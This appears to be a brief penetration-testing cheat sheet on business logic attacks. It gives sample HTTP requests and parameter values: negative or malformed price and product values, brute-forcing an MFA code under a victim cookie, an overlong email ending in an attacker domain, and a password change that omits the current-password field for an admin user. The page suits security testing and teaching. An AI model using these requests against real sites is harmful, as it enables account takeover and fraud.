# Business Logic Attack

Business Logic is the part of the program that encodes the real-world business rules that determine how data can be created, stored, and changed.

### Change Request Params to Unexpected Values <a href="#change-request-params-to-unexpected-values" id="change-request-params-to-unexpected-values"></a>

```shellscript
productId=-1
productId=a
productId=  # empty value

price=-1000
price=1000-
price=%1000
price=%-1000
```

### Exploit Broken Two-Factor <a href="#exploit-broken-two-factor" id="exploit-broken-two-factor"></a>

#### Brute force a MFA Code <a href="#brute-force-a-mfa-code" id="brute-force-a-mfa-code"></a>

```shellscript
POST /login HTTP/1.1
Cookie: verify=victim
...

<!-- Brute force digits code -->
mfa-code=1111
```

### Loop Back with 2,147,483,647 <a href="#loop-back-with-2147483647" id="loop-back-with-2147483647"></a>

No contents yet.

### Register with Too Long-Length Email Address <a href="#register-with-too-long-length-email-address" id="register-with-too-long-length-email-address"></a>

```shellscript
POST /register HTTP/1.1
...

username=attacker&password=pass1&email=aaaaaaaaaaaaa...aa@vulnerable.com.attacker.com
```

### Remove the Specific POST Params <a href="#remove-the-specific-post-params" id="remove-the-specific-post-params"></a>

```shellscript
POST /change-password HTTP/1.1
...

<!-- Remove 'current-password' parameter -->
username=admin&new-password-1=newpass&new-password-2=newpass
```